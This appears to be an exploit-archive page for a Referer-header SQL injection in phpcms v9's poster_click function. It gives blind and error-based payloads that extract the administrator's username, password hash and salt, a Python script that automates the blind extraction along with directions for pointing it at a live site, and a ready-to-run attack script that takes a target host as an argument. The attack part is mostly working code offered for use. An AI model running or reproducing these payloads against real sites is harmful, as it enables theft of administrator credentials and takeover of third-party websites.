phpcms poster_click injection 0day exploit code

2013-01-10T00:00:00
ID MYHACK58:62201336653
Type myhack58
Reporter Anonymous
Modified 2013-01-10T00:00:00

Description

Someone released a phpcms v9 0day, so I quickly wrote an exploit for it. The injection payload comes in two forms:

Vulnerable function: \phpcms\modules\poster\index.php

public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // A non-existent poster id returns before the INSERT, so the target id must exist.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if ($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // HTTP_REFERER is the raw Referer header, stored without escaping: this is the injection point.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}

How to use it:

1. Boolean-based blind injection:

referer:1',(select password from v9_admin where userid=1 and substr(password,4)='xxoo'),'1')#

Whether the page returns normally or not tells you whether the guess was right, so the password hash is recovered piece by piece. Note that substr(password,4) returns the hash from the fourth character to the end; to test one character per request use substr(password,N,1)='x' and advance N.
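The blind method above, automated and run against a constructed in-process stand-in for the target. This is an added example, not the page's exploit: the admin hash, the query-builder model and the yes/no oracle are all constructed here, and the model of how phpcms concatenates the INSERT is written for this example rather than taken from phpcms.

```python
import re

# Constructed admin password hash for the stand-in target (not real data).
FAKE_ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
HEX_DIGITS = "0123456789abcdef"


def build_insert(referer):
    """Model (written for this example) of how the values collected by
    poster_click() are concatenated into the INSERT: every value is wrapped
    in single quotes, and the Referer goes in unescaped."""
    row = [("siteid", "1"), ("pid", "2"), ("username", ""), ("area", ""),
           ("ip", "127.0.0.1"), ("referer", referer),
           ("clicktime", "1357776000"), ("type", "1")]
    cols = ",".join("`%s`" % c for c, _ in row)
    vals = ",".join("'%s'" % v for _, v in row)
    return "INSERT INTO `v9_poster_click`(%s) VALUES (%s)" % (cols, vals)


def blind_payload(pos, ch):
    """Referer asserting 'character pos of the admin hash is ch'.  Same shape
    as the page's payload, with substr(password,pos,1) so one character is
    tested per request."""
    return ("1',(select password from v9_admin where userid=1 and "
            "substr(password,%d,1)='%s'),'1')#" % (pos, ch))


COND = re.compile(r"substr\(password,(\d+),1\)='([0-9a-f])'")


def fake_server(referer):
    """Constructed oracle standing in for the target site.  It builds the
    same query the real site would and answers True when the page would
    come back normally (the subquery found a row) and False for the
    failure case the text describes (the guess was wrong)."""
    sql = build_insert(referer)
    m = COND.search(sql)
    if m is None:
        return True            # a harmless Referer: the insert just succeeds
    pos, ch = int(m.group(1)), m.group(2)
    return FAKE_ADMIN_HASH[pos - 1] == ch


def extract_hash(oracle, length=32):
    """Recover the 32-char hash one hex digit at a time from the yes/no
    oracle (at most 16 requests per character, 512 in total)."""
    recovered = []
    for pos in range(1, length + 1):
        for ch in HEX_DIGITS:
            if oracle(blind_payload(pos, ch)):
                recovered.append(ch)
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % pos)
    return "".join(recovered)


if __name__ == "__main__":
    print(build_insert(blind_payload(1, "5")))
    print(extract_hash(fake_server))
```

Against a live target, replace fake_server with a function that sends the Referer in the same GET request the script at the end of this page uses and returns whether the response was the normal redirect rather than the error page.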

2. Error-based injection, written at the same time and attached here (this is the payload the script below uses):

1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#

This is the classic floor(rand(0)*2) / group by duplicate-entry technique; look up the principle yourself if it is unfamiliar. The inner SELECT must return exactly one row: on a site with several administrators add LIMIT 1 (or WHERE userid=1), otherwise MySQL answers "Subquery returns more than 1 row" instead of leaking the hash.
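The principle behind the error-based payload, as an added example that is not part of the original page: a reimplementation of MySQL's RAND(seed) generator (the my_rnd() LCG and the seeding constants from Item_func_rand) and of the temporary-table GROUP BY evaluation that produces the duplicate key, followed by a parser for the error text in the form the exploit below reads it. The sample error page is constructed, not a real capture.

```python
import re


class MySQLRand:
    """MySQL's my_rnd() linear congruential generator, seeded the way
    RAND(N) seeds it (Item_func_rand::seed_random)."""
    MAX = 0x3FFFFFFF

    def __init__(self, seed):
        seed &= 0xFFFFFFFF
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % self.MAX
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % self.MAX

    def rnd(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % self.MAX
        self.seed2 = (self.seed1 + self.seed2 + 33) % self.MAX
        return self.seed1 / self.MAX


def floor_rand_times_2(n, seed=0):
    """First n values of floor(rand(seed)*2).  With seed 0 this is the
    fixed sequence 0,1,1,0,1,1,0,0,... that the technique depends on."""
    r = MySQLRand(seed)
    return [int(r.rnd() * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (ER_DUP_ENTRY)."""


def group_by_rand(row_count, leak, seed=0):
    """Model of MySQL running
        select count(*), concat(floor(rand(0)*2), leak) a
        from <row_count rows> group by a
    through a temporary table.  The key expression is evaluated once to
    look a group up and again when a new group is inserted, so a miss
    consumes two rand() values: row 1 looks up '0leak' and inserts '1leak';
    row 2 looks up '1leak' (hit); row 3 looks up '0leak' (miss) and then
    tries to insert '1leak', which already exists.  Three source rows are
    enough, and information_schema.tables always has more."""
    r = MySQLRand(seed)
    groups = {}
    for _ in range(row_count):
        key = "%d%s" % (int(r.rnd() * 2), leak)      # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = "%d%s" % (int(r.rnd() * 2), leak)      # re-evaluated for the insert
        if key in groups:
            raise DuplicateEntry("Duplicate entry '%s' for key 'group_key'" % key)
        groups[key] = 1
    return groups


def duplicate_entry_message(row_count, leak, seed=0):
    """Run the model and return the error text MySQL would print, or None
    when the query completes without a collision (too few rows)."""
    try:
        group_by_rand(row_count, leak, seed)
    except DuplicateEntry as e:
        return str(e)
    return None


DUP_RE = re.compile(r"Duplicate entry '([01])(.+?)' for key")


def parse_leak(body):
    """Extract username, password hash and encrypt salt from the error page.
    The first character is the floor(rand(0)*2) prefix; the three fields are
    joined by 0x5f ('_').  Split from the right, since the hash and the salt
    contain no underscore but a username might."""
    m = DUP_RE.search(body)
    if m is None:
        return None
    username, password, encrypt = m.group(2).rsplit("_", 2)
    return {"username": username, "password": password, "encrypt": encrypt}


# Constructed error page in the shape phpcms's db layer prints (not a real capture).
SAMPLE_ERROR_PAGE = ("MySQL Error : Duplicate entry "
                     "'1admin_e10adc3949ba59abbe56e057f20f883e_g7Hk2q' for key 'group_key'")

if __name__ == "__main__":
    print(floor_rand_times_2(10))
    print(duplicate_entry_message(3, "admin_<hash>_<encrypt>"))
    print(parse_leak(SAMPLE_ERROR_PAGE))
```

The leading '1' in every real-world "Duplicate entry '1admin_...'" message is the floor(rand(0)*2) value computed at insert time, which is why the script's regex and parse_leak both expect a digit in front of the username.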

Exploit script:

#!/usr/bin/env python3
# phpcms v9 poster_click error-based injection. The original was Python 2 (httplib);
# ported to http.client with the same request and the same response parsing.
import http.client
import re
import sys

# Error-based payload; it rides in the Referer header, which poster_click() stores unescaped.
PAYLOAD = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
           "(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a "
           "from information_schema.tables group by a)b),'1')#")


def attack():
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    url = sys.argv[1]
    paths = sys.argv[2]
    conn = http.client.HTTPConnection(url)
    i_headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        "Referer": PAYLOAD,
    }
    # id must be an existing poster, otherwise poster_click() returns before the INSERT.
    conn.request("GET", paths.rstrip("/") + "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2",
                 headers=i_headers)
    r1 = conn.getresponse()
    datas = r1.read().decode("utf-8", "replace")
    # The admin row comes back inside MySQL's duplicate-key error text.
    datas = re.findall(r"Duplicate entry '\w+'", datas)
    if datas:
        print(datas[0])
    else:
        print("No 'Duplicate entry' in the response: not vulnerable, DB errors hidden, or id=2 is not an existing poster")
    conn.close()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("  phpcmsattack.py www.paxmac.org /")
        print("  phpcmsattack.py www.paxmac.org /phpcmsv9/")
        sys.exit(1)
    attack()